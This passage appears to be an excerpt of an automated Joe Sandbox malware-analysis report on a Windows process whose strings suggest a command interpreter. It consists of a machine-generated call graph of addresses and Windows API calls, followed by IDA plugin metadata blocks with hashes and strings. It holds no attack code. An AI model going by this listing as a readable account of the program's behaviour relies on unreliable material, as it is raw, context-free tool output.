18283->18281 18284->18258 18284->18281 18286 7ff789bef4c1 GetStdHandle 18285->18286 18287 7ff789be8450 367 API calls 18286->18287 18288 7ff789bef4ea 18287->18288 18289 7ff789bef4ee wcschr 18288->18289 18290 7ff789bef509 18288->18290 18289->18286 18289->18290 18291 7ff789bd8f80 7 API calls 18290->18291 18292 7ff789bef519 18291->18292 18292->18190 18294 7ff789bd34bf 18293->18294 18315 7ff789bd34f5 18293->18315 18295 7ff789bd3578 6 API calls 18294->18295 18296 7ff789bd34c9 
18295->18296 18297 7ff789bd350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 18296->18297 18298 7ff789bd34cd 18296->18298 18300 7ff789bde8d2 GetLastError 18297->18300 18301 7ff789bd3557 ReleaseSRWLockShared 18297->18301 18299 7ff789bd36ec 6 API calls 18298->18299 18302 7ff789bd34e1 18299->18302 18303 7ff789bde8e5 GetLastError 18300->18303 18301->18302 18302->18303 18302->18315 18304 7ff789bd01b8 6 API calls 18303->18304 18305 7ff789bde904 18304->18305 18306 7ff789bde918 18305->18306 18307 7ff789bde908 18305->18307 18447 7ff789bef318 _get_osfhandle GetFileType 18306->18447 18308 7ff789bc3278 160 API calls 18307->18308 18308->18315 18310 7ff789bde91f 18311 7ff789bde923 18310->18311 18312 7ff789bde931 18310->18312 18313 7ff789bc3278 160 API calls 18311->18313 18314 7ff789bef1d8 160 API calls 18312->18314 18313->18315 18314->18315 18315->18148 18317 7ff789bd1935 18316->18317 18318 7ff789bd193b 18316->18318 18317->18318 18319 7ff789bd19a1 18317->18319 18320 7ff789bd195a 18318->18320 18321 7ff789bd1946 wcsrchr 18318->18321 18322 7ff789bddbda 18319->18322 18323 7ff789bd2e44 memset malloc 18319->18323 18325 7ff789bd8f80 7 API calls 18320->18325 18321->18320 18322->18320 18324 7ff789bddbdf longjmp 18322->18324 18346 7ff789bddccd 18322->18346 18345 7ff789bd19cf 18323->18345 18326 7ff789bddbf3 ??_V@YAXPEAX 18324->18326 18327 7ff789bd1978 18325->18327 18328 7ff789bddbff ??_V@YAXPEAX 18326->18328 18327->18230 18328->18320 18329 7ff789bd1a21 18332 7ff789bddc3c wcschr 18329->18332 18333 7ff789bd1a3c wcsrchr 18329->18333 18339 7ff789bd1dfe 18329->18339 18330 7ff789bd19f3 towlower wcsrchr 18330->18329 18331 7ff789bd1af6 wcsrchr 18330->18331 18336 7ff789bd1b11 towlower 18331->18336 18331->18339 18334 7ff789bddcd2 18332->18334 18335 7ff789bddc5d 18332->18335 18337 7ff789bd1a54 wcsrchr 18333->18337 18333->18339 18334->18328 18341 7ff789bc3278 166 API calls 18334->18341 18338 7ff789bccd90 166 API calls 18335->18338 18336->18339 18336->18345 18337->18334 18340 7ff789bd1a71 
18337->18340 18351 7ff789bddc75 18338->18351 18339->18332 18339->18334 18344 7ff789bd1a95 18340->18344 18348 7ff789bcb900 166 API calls 18340->18348 18343 7ff789bddcef longjmp 18341->18343 18342 7ff789bd1d74 18342->18320 18352 7ff789bd1d7d ??_V@YAXPEAX 18342->18352 18347 7ff789bddd03 18343->18347 18344->18322 18344->18342 18349 7ff789bd1b64 18344->18349 18350 7ff789bd1acf 18344->18350 18345->18322 18345->18329 18345->18330 18345->18339 18346->18328 18353 7ff789bddd3b 18347->18353 18354 7ff789bddd0c SearchPathW 18347->18354 18348->18344 18349->18347 18357 7ff789bd1b76 GetFullPathNameW 18349->18357 18355 7ff789bcb900 166 API calls 18350->18355 18351->18322 18356 7ff789bd3a90 170 API calls 18351->18356 18352->18320 18363 7ff789bddd5c wcsrchr 18353->18363 18354->18353 18358 7ff789bd1ad7 ??_V@YAXPEAX 18355->18358 18359 7ff789bddc98 18356->18359 18360 7ff789bd2978 13 API calls 18357->18360 18358->18320 18361 7ff789bcff70 GetProcessHeap RtlFreeHeap 18359->18361 18362 7ff789bd1ba7 wcsrchr 18360->18362 18361->18322 18362->18363 18364 7ff789bd1bc9 18362->18364 18365 7ff789bddd73 18363->18365 18364->18342 18366 7ff789bd1bda memset 18364->18366 18367 7ff789bddd8c 18365->18367 18368 7ff789bddd78 longjmp 18365->18368 18369 7ff789bcca40 17 API calls 18366->18369 18367->18326 18367->18328 18368->18367 18370 7ff789bd1c23 18369->18370 18370->18365 18371 7ff789bddda8 GetFileAttributesExW 18370->18371 18384 7ff789bd1c4f 18370->18384 18372 7ff789bddfd0 18371->18372 18374 7ff789bdddc5 18371->18374 18372->18230 18373 7ff789bcb900 166 API calls 18375 7ff789bd1d52 18373->18375 18376 7ff789bddf34 18374->18376 18380 7ff789be85d0 8 API calls 18374->18380 18375->18342 18379 7ff789bd1d68 ??_V@YAXPEAX 18375->18379 18381 7ff789bddf4d 18376->18381 18376->18384 18377 7ff789bd1d09 18377->18373 18378 7ff789bde035 18377->18378 18379->18342 18382 7ff789bdde3f 18380->18382 18383 7ff789bf08ec 9 API calls 18381->18383 18386 7ff789bc6ee4 166 API calls 18382->18386 18383->18372 18384->18339 18384->18377 
18385 7ff789bd1cd8 wcsrchr 18384->18385 18385->18378 18387 7ff789bd1cf5 18385->18387 18388 7ff789bddeb6 18386->18388 18387->18339 18387->18377 18389 7ff789bd3140 166 API calls 18388->18389 18389->18376 18391 7ff789bcd8b5 18390->18391 18392 7ff789bcdefa 18390->18392 18393 7ff789bcdf04 18391->18393 18398 7ff789bcd8e5 18391->18398 18394 7ff789bc3278 166 API calls 18392->18394 18395 7ff789bcdf15 longjmp 18393->18395 18418 7ff789bcda67 18393->18418 18394->18393 18395->18418 18396 7ff789bcff70 GetProcessHeap RtlFreeHeap 18397 7ff789bcdf34 18396->18397 18399 7ff789bcff70 GetProcessHeap RtlFreeHeap 18397->18399 18400 7ff789bcdeb6 18398->18400 18401 7ff789bcd94d GetProcessHeap HeapAlloc 18398->18401 18398->18418 18402 7ff789bcdf3c 18399->18402 18403 7ff789bc3278 166 API calls 18400->18403 18401->18400 18410 7ff789bcd97c 18401->18410 18402->18230 18404 7ff789bcdec5 18403->18404 18405 7ff789bcdeda longjmp 18404->18405 18404->18418 18405->18418 18406 7ff789bd081c 166 API calls 18406->18410 18407 7ff789bcdbce wcstol 18407->18410 18408 7ff789bcdaa9 18409 7ff789bcde4a 18408->18409 18415 7ff789bcdaf3 18408->18415 18408->18418 18411 7ff789bc3278 166 API calls 18409->18411 18409->18418 18410->18404 18410->18406 18410->18407 18410->18408 18410->18410 18413 7ff789bcdc43 18410->18413 18410->18418 18412 7ff789bcde69 longjmp 18411->18412 18412->18418 18414 7ff789bcdc52 wcstol 18413->18414 18413->18418 18414->18418 18416 7ff789bcdb80 _wcsnicmp 18415->18416 18415->18418 18416->18415 18417 7ff789bcdd0f 18416->18417 18419 7ff789bcdd30 memmove 18417->18419 18420 7ff789bcde97 memmove 18417->18420 18418->18396 18419->18418 18420->18400 18422 7ff789be8491 18421->18422 18423 7ff789be8498 18421->18423 18425 7ff789be7f00 357 API calls 18422->18425 18424 7ff789bd0010 9 API calls 18423->18424 18426 7ff789be8496 18424->18426 18425->18426 18426->18252 18426->18253 18428 7ff789bf13f3 18427->18428 18429 7ff789bf13ac 18427->18429 18428->18281 18430 7ff789bf13d8 free 18429->18430 18431 7ff789bf13bf free 
18429->18431 18430->18428 18431->18430 18431->18431 18434 7ff789bccd90 166 API calls 18433->18434 18437 7ff789bf110b 18434->18437 18435 7ff789bf1360 18435->18281 18436 7ff789bf1240 memmove 18440 7ff789bf1289 18436->18440 18437->18435 18437->18436 18441 7ff789bf11d5 wcschr 18437->18441 18443 7ff789bf1138 18437->18443 18438 7ff789bcff70 GetProcessHeap RtlFreeHeap 18438->18435 18442 7ff789bf0c90 309 API calls 18440->18442 18441->18437 18442->18443 18443->18438 18445 7ff789be828a GetConsoleScreenBufferInfo 18444->18445 18446 7ff789bef259 _get_osfhandle SetConsoleMode 18444->18446 18445->18278 18446->18445 18447->18310 18449 7ff789bed381 18448->18449 18450 7ff789bed3d8 18448->18450 18451 7ff789bd34a0 166 API calls 18449->18451 18453 7ff789bed390 18451->18453 18452 7ff789bd3448 166 API calls 18452->18453 18453->18450 18453->18452 18454 7ff789bd34a0 166 API calls 18453->18454 18454->18453 18456 7ff789bd3448 166 API calls 18455->18456 18457 7ff789bed33b 18456->18457 18458 7ff789bed36c 166 API calls 18457->18458 18459 7ff789bed343 18458->18459 18460 7ff789bed3fc 166 API calls 18459->18460 18462 7ff789bed34e 18460->18462 18461 7ff789bed576 18463 7ff789bed555 18461->18463 18464 7ff789bed592 18461->18464 18462->18461 18462->18463 18462->18464 18466 7ff789bed5c4 18462->18466 18470 7ff789bed541 18462->18470 18472 7ff789bd3448 166 API calls 18462->18472 18476 7ff789bed5c2 18462->18476 18477 7ff789bed3fc 166 API calls 18462->18477 18468 7ff789bed31c 166 API calls 18463->18468 18465 7ff789bd3448 166 API calls 18464->18465 18469 7ff789bed5a5 18465->18469 18467 7ff789bd3448 166 API calls 18466->18467 18467->18476 18468->18476 18471 7ff789bed5ba 18469->18471 18474 7ff789bd3448 166 API calls 18469->18474 18470->18464 18473 7ff789bed546 18470->18473 18475 7ff789bed36c 166 API calls 18471->18475 18472->18462 18473->18463 18473->18466 18474->18471 18475->18476 18476->18097 18477->18462 18479 7ff789bc745f 18478->18479 18480 7ff789bc7468 18478->18480 18479->18480 18481 7ff789bc7497 _wcsicmp 
18479->18481 18482 7ff789be48c8 _wcsicmp 18479->18482 18480->17885 18480->17890 18483 7ff789bd1ea0 8 API calls 18481->18483 18485 7ff789be48ed CreateFileW 18482->18485 18484 7ff789bc74bd 18483->18484 18484->18485 18486 7ff789bc74c9 CreateFileW 18484->18486 18485->18486 18487 7ff789be4929 18485->18487 18488 7ff789be4943 GetLastError 18486->18488 18489 7ff789bc7501 _open_osfhandle 18486->18489 18487->18489 18488->18480 18489->18480 18490 7ff789bc7520 CloseHandle 18489->18490 18490->18480 18492->17888 18495 7ff789bebf99 18494->18495 18497 7ff789bebfb5 18494->18497 18496 7ff789bd9324 malloc 18495->18496 18496->18497 18497->17923 18497->17936 18497->17949 18499 7ff789bd3421 18498->18499 18500 7ff789bd3433 18498->18500 18569 7ff789bd3684 _vsnwprintf 18499->18569 18500->17783 18571 7ff789bc58d4 RegOpenKeyExW 18502->18571 18505 7ff789bd33f0 _vsnwprintf 18506 7ff789bc58c2 18505->18506 18506->17949 18507->17949 18509 7ff789bc6f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 18508->18509 18529 7ff789bc6fbf 18508->18529 18510 7ff789bc6f90 18509->18510 18514 7ff789be42b6 18509->18514 18574 7ff789bd5508 GetUserDefaultLangID 18510->18574 18515 7ff789be4322 realloc 18514->18515 18516 7ff789be433f 18514->18516 18520 7ff789bc3278 153 API calls 18514->18520 18515->18514 18515->18516 18517 7ff789bd33f0 _vsnwprintf 18516->18517 18525 7ff789be437d 18517->18525 18518 7ff789bd5508 GetUserDefaultLangID 18519 7ff789bc7042 GetDateFormatW 18518->18519 18521 7ff789bc707a 18519->18521 18520->18514 18522 7ff789bd5508 GetUserDefaultLangID 18521->18522 18530 7ff789bc708a 18521->18530 18523 7ff789bc714a GetDateFormatW 18522->18523 18526 7ff789be42a0 GetLastError 18523->18526 18527 7ff789bc7175 realloc 18523->18527 18524 7ff789be427f memmove 18524->18529 18533 7ff789be43ea 18525->18533 18536 7ff789be43fb 18525->18536 18526->18514 18527->18514 18528 7ff789bc719c 18527->18528 18531 7ff789bd5508 GetUserDefaultLangID 18528->18531 18529->18518 18529->18524 18529->18529 
18532 7ff789bc7020 memmove 18529->18532 18576 7ff789be8654 18529->18576 18530->18525 18539 7ff789bc70bd 18530->18539 18534 7ff789bc71ae GetDateFormatW 18531->18534 18532->18529 18535 7ff789bd3448 153 API calls 18533->18535 18534->18526 18534->18529 18538 7ff789be43f9 18535->18538 18537 7ff789bd3448 153 API calls 18536->18537 18537->18538 18539->18538 18539->18539 18540 7ff789bd8f80 7 API calls 18539->18540 18541 7ff789bc7129 18540->18541 18541->17949 18543 7ff789bd3184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 18542->18543 18544 7ff789bde59e 18542->18544 18545 7ff789bd31e0 18543->18545 18546 7ff789bde5ed 18543->18546 18547 7ff789be8654 9 API calls 18544->18547 18550 7ff789bd31ff 18545->18550 18551 7ff789bde5a8 18545->18551 18548 7ff789bde750 18546->18548 18549 7ff789bde5fe 18546->18549 18547->18551 18556 7ff789bd33f0 _vsnwprintf 18548->18556 18553 7ff789bd5508 GetUserDefaultLangID 18549->18553 18554 7ff789bd33f0 _vsnwprintf 18550->18554 18552 7ff789bd3448 159 API calls 18551->18552 18562 7ff789bde5e8 18552->18562 18555 7ff789bde606 GetLocaleInfoW 18553->18555 18557 7ff789bd3247 18554->18557 18566 7ff789bde629 18555->18566 18563 7ff789bde748 18556->18563 18557->18557 18558 7ff789bd8f80 7 API calls 18557->18558 18560 7ff789bd3266 18558->18560 18559 7ff789bde711 18561 7ff789bd5508 GetUserDefaultLangID 18559->18561 18560->17949 18564 7ff789bde716 GetTimeFormatW 18561->18564 18562->18562 18563->18562 18565 7ff789bd34a0 159 API calls 18563->18565 18564->18563 18565->18562 18566->18559 18567 7ff789bde6e7 memmove 18566->18567 18567->18566 18570 7ff789bd36b7 18569->18570 18570->18500 18572 7ff789bc5913 RegQueryValueExW RegCloseKey 18571->18572 18573 7ff789bc588c 18571->18573 18572->18573 18573->18505 18575 7ff789bc6f97 GetLocaleInfoW 18574->18575 18575->18529 18577 7ff789be8686 18576->18577 18578 7ff789be8673 GetSystemTime 18576->18578 18579 7ff789be86cc SystemTimeToFileTime 18577->18579 18578->18579 18580 7ff789bd8f80 7 API calls 
18579->18580 18581 7ff789be86ed 18580->18581 18581->18529 18585 7ff789be773c 18582->18585 18583 7ff789be777d 18583->17978 18584 7ff789bd3448 166 API calls 18584->18585 18585->18583 18585->18584 18587 7ff789be778c 166 API calls 18586->18587 18588 7ff789be76fb 18587->18588 18589 7ff789be771c 18588->18589 18590 7ff789bd3448 166 API calls 18588->18590 18589->17978 18591 7ff789be7711 18590->18591 18592 7ff789be778c 166 API calls 18591->18592 18592->18589 18594 7ff789bc6b23 18593->18594 18595 7ff789bc6a51 18593->18595 18594->18003 18595->18594 18596 7ff789be417c 18595->18596 18597 7ff789bc6ab2 18595->18597 18598 7ff789beec14 173 API calls 18596->18598 18599 7ff789bd3c24 166 API calls 18597->18599 18600 7ff789be4190 18598->18600 18601 7ff789bc6abf GetProcessHeap RtlFreeHeap 18599->18601 18622 7ff789bc6b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 18601->18622 18607 7ff789beca9e 18606->18607 18608 7ff789bec98e 18606->18608 18607->18008 18609 7ff789beee4c TerminateProcess GetLastError 18608->18609 18615 7ff789bec9b3 18608->18615 18609->18608 18610 7ff789bd5cb4 7 API calls 18610->18615 18611 7ff789beca21 _get_osfhandle FlushFileBuffers 18613 7ff789bcb038 _dup2 18611->18613 18612 7ff789bcd208 _close 18612->18615 18613->18615 18614 7ff789bcb038 _dup2 18614->18615 18615->18607 18615->18610 18615->18611 18615->18612 18615->18614 18617 7ff789bd3a53 FindClose 18616->18617 18621 7ff789bd3a25 18616->18621 18618 7ff789bd3a74 GetLastError 18617->18618 18619 7ff789bd3a66 18617->18619 18618->18619 18619->18009 18620 7ff789bdec38 18621->18617 18621->18620 18623 7ff789bd4a14 5 API calls 18622->18623 18624 7ff789bc6ae8 18623->18624 18625 7ff789bc6b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 18624->18625 18627 7ff789bcc486 18626->18627 18628 7ff789bcc4c9 18626->18628 18629 7ff789bcc48e wcschr 18627->18629 18633 7ff789bcc161 18627->18633 18631 7ff789bcff70 2 API calls 18628->18631 18628->18633 18630 7ff789bcc4ef 18629->18630 18629->18633 18632 7ff789bccd90 166 API calls 
18630->18632 18631->18633 18639 7ff789bcc4f9 18632->18639 18633->17008 18633->17011 18634 7ff789bcc5bd 18635 7ff789bcc541 18634->18635 18638 7ff789bcb6b0 170 API calls 18634->18638 18635->18633 18637 7ff789bcff70 2 API calls 18635->18637 18636 7ff789bcd840 178 API calls 18636->18639 18637->18633 18638->18635 18639->18633 18639->18634 18639->18635 18639->18636 18640->17056 18642 7ff789bd3bcf 18641->18642 18644 7ff789bd3bfe 18641->18644 18643 7ff789bd3bdc wcschr 18642->18643 18642->18644 18643->18642 18643->18644 18644->17107 18646 7ff789bd8f80 7 API calls 18645->18646 18647 7ff789bd296b 18646->18647 18647->17107 18649 7ff789bd2f97 18648->18649 18650 7ff789bd2f2a 18648->18650 18649->18650 18652 7ff789bd2f9c wcschr 18649->18652 18667 7ff789bd823c FindFirstFileExW 18650->18667 18653 7ff789bd2fb6 wcschr 18652->18653 18655 7ff789bd2f5a 18652->18655 18653->18650 18653->18655 18658 7ff789bd8f80 7 API calls 18655->18658 18661 7ff789bde4ec 18655->18661 18656 7ff789bd3a0c 2 API calls 18657 7ff789bd2fe0 18656->18657 18657->18655 18659 7ff789bd2fe9 wcsrchr 18657->18659 18660 7ff789bd2f83 18658->18660 18659->18655 18660->17107 18663 7ff789bcb6b0 170 API calls 18662->18663 18664 7ff789bcaf82 18663->18664 18664->17107 18665 7ff789bcff70 2 API calls 18664->18665 18666 7ff789bdbf6e 18665->18666 18666->17107 18668 7ff789bd829d GetLastError 18667->18668 18670 7ff789bd82cd 18667->18670 18669 7ff789bd2f56 18668->18669 18669->18655 18669->18656 18671 7ff789bd8365 FindNextFileW 18670->18671 18672 7ff789bd82e5 18670->18672 18673 7ff789bd83d0 FindClose 18671->18673 18674 7ff789bd837d 18671->18674 18676 7ff789bd8332 GetProcessHeap HeapAlloc 18672->18676 18677 7ff789bd8302 18672->18677 18678 7ff789bd8310 18672->18678 18673->18672 18674->18670 18675 7ff789bd8386 18674->18675 18675->18668 18676->18678 18677->18678 18679 7ff789bd838b GetProcessHeap HeapReAlloc 18677->18679 18678->18668 18678->18669 18679->18678 18680 7ff789be50f8 GetLastError FindClose 18679->18680 18680->18669 18682 
7ff789be4621 18681->18682 18683 7ff789bc72de 18681->18683 18685 7ff789be47e0 18682->18685 18686 7ff789be447b longjmp 18682->18686 18689 7ff789be475e 18682->18689 18690 7ff789be4639 18682->18690 18684 7ff789bc72eb 18683->18684 18693 7ff789be4530 18683->18693 18694 7ff789be4467 18683->18694 18742 7ff789bc7348 18684->18742 18688 7ff789bc7348 168 API calls 18685->18688 18691 7ff789be4492 18686->18691 18741 7ff789be4524 18688->18741 18701 7ff789bc7348 168 API calls 18689->18701 18695 7ff789be4695 18690->18695 18696 7ff789be463e 18690->18696 18697 7ff789bc7348 168 API calls 18691->18697 18698 7ff789bc7348 168 API calls 18693->18698 18694->18684 18694->18691 18700 7ff789be4475 18694->18700 18706 7ff789bc73d4 168 API calls 18695->18706 18696->18686 18714 7ff789be4654 18696->18714 18702 7ff789be44a8 18697->18702 18725 7ff789be4549 18698->18725 18699 7ff789bc7315 18757 7ff789bc73d4 18699->18757 18700->18686 18700->18695 18701->18685 18715 7ff789be44e2 18702->18715 18719 7ff789bc7348 168 API calls 18702->18719 18703 7ff789bc7348 168 API calls 18703->18699 18704 7ff789bc72b0 168 API calls 18708 7ff789be480e 18704->18708 18727 7ff789be469a 18706->18727 18707 7ff789be45b2 18709 7ff789bc7348 168 API calls 18707->18709 18708->17149 18713 7ff789be45c7 18709->18713 18710 7ff789be455e 18710->18707 18717 7ff789bc7348 168 API calls 18710->18717 18711 7ff789be46e1 18712 7ff789bc72b0 168 API calls 18711->18712 18721 7ff789be4738 18712->18721 18718 7ff789bc7348 168 API calls 18713->18718 18716 7ff789bc7348 168 API calls 18714->18716 18720 7ff789bc72b0 168 API calls 18715->18720 18722 7ff789bc7323 18716->18722 18717->18707 18724 7ff789be45db 18718->18724 18719->18715 18726 7ff789be44f1 18720->18726 18723 7ff789bc7348 168 API calls 18721->18723 18722->17149 18723->18741 18728 7ff789bc7348 168 API calls 18724->18728 18725->18707 18725->18710 18730 7ff789bc7348 168 API calls 18725->18730 18729 7ff789bc72b0 168 API calls 18726->18729 18727->18711 18731 7ff789be46c7 18727->18731 18732 
7ff789be46ea 18727->18732 18733 7ff789be45ec 18728->18733 18734 7ff789be4503 18729->18734 18730->18710 18731->18711 18738 7ff789bc7348 168 API calls 18731->18738 18735 7ff789bc7348 168 API calls 18732->18735 18736 7ff789bc7348 168 API calls 18733->18736 18734->18722 18737 7ff789bc7348 168 API calls 18734->18737 18735->18711 18739 7ff789be4600 18736->18739 18737->18741 18738->18711 18740 7ff789bc7348 168 API calls 18739->18740 18740->18741 18741->18704 18741->18722 18743 7ff789bc735d 18742->18743 18744 7ff789bc3278 166 API calls 18743->18744 18746 7ff789be4838 18743->18746 18756 7ff789bc73ab 18743->18756 18745 7ff789be4820 longjmp 18744->18745 18745->18746 18747 7ff789bc3278 166 API calls 18746->18747 18748 7ff789be4844 longjmp 18747->18748 18749 7ff789be485a 18748->18749 18750 7ff789bc7348 166 API calls 18749->18750 18751 7ff789be487b 18750->18751 18752 7ff789bc7348 166 API calls 18751->18752 18753 7ff789be48ad 18752->18753 18754 7ff789bc7348 166 API calls 18753->18754 18755 7ff789bc72ff 18754->18755 18755->18699 18755->18703 18758 7ff789bc7401 18757->18758 18759 7ff789be485a 18757->18759 18758->18722 18760 7ff789bc7348 168 API calls 18759->18760 18761 7ff789be487b 18760->18761 18762 7ff789bc7348 168 API calls 18761->18762 18763 7ff789be48ad 18762->18763 18764 7ff789bc7348 168 API calls 18763->18764 18765 7ff789be48be 18764->18765 18765->18722 16742 7ff789bd8d80 16743 7ff789bd8da4 16742->16743 16744 7ff789bd8db6 16743->16744 16745 7ff789bd8dbf Sleep 16743->16745 16746 7ff789bd8ddb _amsg_exit 16744->16746 16748 7ff789bd8de7 16744->16748 16745->16743 16746->16748 16747 7ff789bd8e56 _initterm 16752 7ff789bd8e73 _IsNonwritableInCurrentImage 16747->16752 16748->16747 16749 7ff789bd8e3c 16748->16749 16748->16752 16756 7ff789bd37d8 GetCurrentThreadId OpenThread 16752->16756 16789 7ff789bd04f4 16756->16789 16758 7ff789bd3839 HeapSetInformation RegOpenKeyExW 16759 7ff789bd388d 16758->16759 16760 7ff789bde9f8 RegQueryValueExW RegCloseKey 16758->16760 16761 7ff789bd5920 
VirtualQuery VirtualQuery 16759->16761 16763 7ff789bdea41 GetThreadLocale 16760->16763 16762 7ff789bd38ab GetConsoleOutputCP GetCPInfo 16761->16762 16762->16763 16764 7ff789bd38f1 memset 16762->16764 16771 7ff789bd3919 16763->16771 16764->16771 16765 7ff789bd4d5c 391 API calls 16765->16771 16766 7ff789bdeb27 _setjmp 16766->16771 16767 7ff789bd3948 _setjmp 16767->16771 16768 7ff789be8530 370 API calls 16768->16771 16769 7ff789bc3240 166 API calls 16769->16771 16770 7ff789bd01b8 6 API calls 16770->16771 16771->16760 16771->16765 16771->16766 16771->16767 16771->16768 16771->16769 16771->16770 16772 7ff789bd4c1c 166 API calls 16771->16772 16773 7ff789bdeb71 _setmode 16771->16773 16774 7ff789bd86f0 182 API calls 16771->16774 16775 7ff789bd0580 12 API calls 16771->16775 16778 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 16771->16778 16779 7ff789bcbe00 647 API calls 16771->16779 16780 7ff789bcdf60 481 API calls 16771->16780 16781 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 16771->16781 16772->16771 16773->16771 16774->16771 16776 7ff789bd398b GetConsoleOutputCP GetCPInfo 16775->16776 16777 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16776->16777 16777->16771 16778->16771 16779->16771 16780->16771 16782 7ff789bdebbe GetConsoleOutputCP GetCPInfo 16781->16782 16783 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16782->16783 16784 7ff789bdebe6 16783->16784 16785 7ff789bcbe00 647 API calls 16784->16785 16786 7ff789bd0580 12 API calls 16784->16786 16785->16784 16787 7ff789bdebfc GetConsoleOutputCP GetCPInfo 16786->16787 16788 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16787->16788 16788->16771 16791 7ff789bd0504 16789->16791 16790 7ff789bd051e GetModuleHandleW 16790->16791 16791->16790 16792 7ff789bd054d GetProcAddress 16791->16792 16793 7ff789bd056c SetThreadLocale 16791->16793 16792->16791
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
• Instruction ID: d48eca7e991860eda796c8a2fffa1c179bb5fca4273eef60afd397f036cc33b0
• Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
• Instruction Fuzzy Hash: AD42C521B0C68A85FA54BF6198182B9ABB1FF85F96FA44134D95E47BD4DF3CE044C320
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                                    • String ID: :$:$:$:ON$OFF
                                                                                                                    • API String ID: 4076514806-467788257
                                                                                                                    • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                    • Instruction ID: 4969cf3e28070cadd62036cb1f5d724d4f6e4ec7f615cebaf54532959e42d219
                                                                                                                    • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                    • Instruction Fuzzy Hash: 9122A321A0865B86EB64BF259514279EEB1FF85F97FE88135CA0E47794EF3CA440C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                                    • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                    • API String ID: 2492766124-2236139042
                                                                                                                    • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
